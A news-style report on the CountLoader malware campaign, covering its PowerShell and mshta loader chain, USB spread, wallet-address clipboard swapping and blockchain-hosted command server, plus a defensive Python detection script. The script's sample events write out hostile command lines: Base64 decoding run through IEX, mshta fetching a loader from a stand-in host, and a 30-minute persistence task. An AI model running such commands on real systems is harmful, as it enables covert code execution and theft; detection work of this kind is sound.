A new wave of malware is covertly targeting cryptocurrency transactions worldwide, employing sophisticated methods to avoid detection. This campaign, identified by cybersecurity researchers, is centered on a complex multi-stage loader known as CountLoader, which chains JavaScript, PowerShell, and shellcode stages to execute its malicious activities.
CountLoader’s Global Impact
The malware campaign has infected tens of thousands of machines across various continents. Researchers from McAfee Labs, who documented these findings, report that around 86,000 unique systems have been compromised. The infection predominantly affects India, Indonesia, and the United States, with significant activity throughout Southeast Asia.
The malware initiates its attack with a malicious executable file that triggers a PowerShell command. This command retrieves an obfuscated JavaScript loader and runs it through the mshta.exe utility, a signed Windows binary that is commonly abused precisely because of its trusted status.
Techniques for Stealth and Spread
CountLoader employs multiple techniques to remain undetected. After the initial executable is run, a scheduled task that fires every 30 minutes is created to maintain persistence. The PowerShell script decodes a Base64 payload and executes it via Invoke-Expression, so the decoded code runs in memory and is never written to disk.
The malware also propagates through USB drives by replacing files with LNK shortcuts, enabling silent execution of the malware while appearing to open legitimate files. This method accounts for approximately 9,000 infections.
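The PowerShell-to-mshta.exe chain, the Base64-plus-Invoke-Expression stage and the 30-minute scheduled task described above are each visible in process-creation telemetry. The following is an added example (not code from the McAfee report or the malware itself) of detection logic run over constructed Sysmon-style process events; the field names, paths and command lines are assumptions for illustration, and the rule assumes the task is created with schtasks.exe.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style); not real telemetry.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    {"parent": "C:\\Windows\\explorer.exe", "image": "C:\\Users\\u\\Downloads\\setup.exe",
     "cmdline": "setup.exe"},
    # Stage 1: dropper launches PowerShell that decodes Base64 and runs it in memory.
    {"parent": "C:\\Users\\u\\Downloads\\setup.exe", "image": PS,
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"IEX([Text.Encoding]::UTF8"
                ".GetString([Convert]::FromBase64String('aGVsbG8=')))\""},
    # Stage 2: PowerShell hands an HTA/JavaScript loader to mshta.exe.
    {"parent": PS, "image": "C:\\Windows\\System32\\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/loader.hta"},
    # Persistence: a task that fires every 30 minutes (hypothetical task name).
    {"parent": PS, "image": "C:\\Windows\\System32\\schtasks.exe",
     "cmdline": "schtasks.exe /create /sc minute /mo 30 /tn Updater /tr "
                "\"powershell -w hidden -c <stage2-placeholder>\""},
    # Benign admin use of PowerShell; must not fire.
    {"parent": "C:\\Windows\\explorer.exe", "image": PS,
     "cmdline": "powershell.exe Get-Process"},
]


def _is(image: str, name: str) -> bool:
    """Case-insensitive match on the executable file name."""
    return image.lower().endswith("\\" + name)


# Each rule is (name, predicate over one event). Patterns are case-insensitive.
RULES = [
    ("mshta_from_powershell",
     lambda e: _is(e["image"], "mshta.exe") and _is(e["parent"], "powershell.exe")),
    ("powershell_b64_iex",
     lambda e: _is(e["image"], "powershell.exe")
     and re.search(r"frombase64string|-enc(odedcommand)?\b", e["cmdline"], re.I)
     and re.search(r"\biex\b|invoke-expression", e["cmdline"], re.I)),
    ("schtasks_every_30min",
     lambda e: _is(e["image"], "schtasks.exe")
     and re.search(r"/sc\s+minute\s+/mo\s+30\b", e["cmdline"], re.I)),
]


def detect(events):
    """Return [(rule_name, cmdline)] for every event matching a rule, in event order."""
    return [(name, e["cmdline"]) for e in events for name, pred in RULES if pred(e)]


if __name__ == "__main__":
    for rule, cmd in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {cmd}")
```

Any one of these rules alone is noisy in an enterprise; correlating all three under the same parent chain within a short window is what makes the CountLoader pattern stand out.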
Cryptocurrency Clipper and EtherHiding Technique
At its core, the malware functions as a cryptocurrency clipper, monitoring clipboard activity and replacing copied wallet addresses with attacker-controlled ones, so funds are redirected without the user noticing. The final payload employs an innovative approach known as EtherHiding: it retrieves its command-and-control server address from the Ethereum blockchain, which makes the infrastructure resilient to takedowns.
Researchers assessed the campaign’s scope by commandeering a backup command-and-control domain, redirecting traffic to their server to observe the malware’s actions.
Users can mitigate risks by avoiding untrusted executable files, carefully managing USB drives, verifying wallet addresses before transactions, and maintaining updated security software.
In the face of evolving cyber threats, understanding and adapting to new attack methodologies is crucial for safeguarding digital assets.
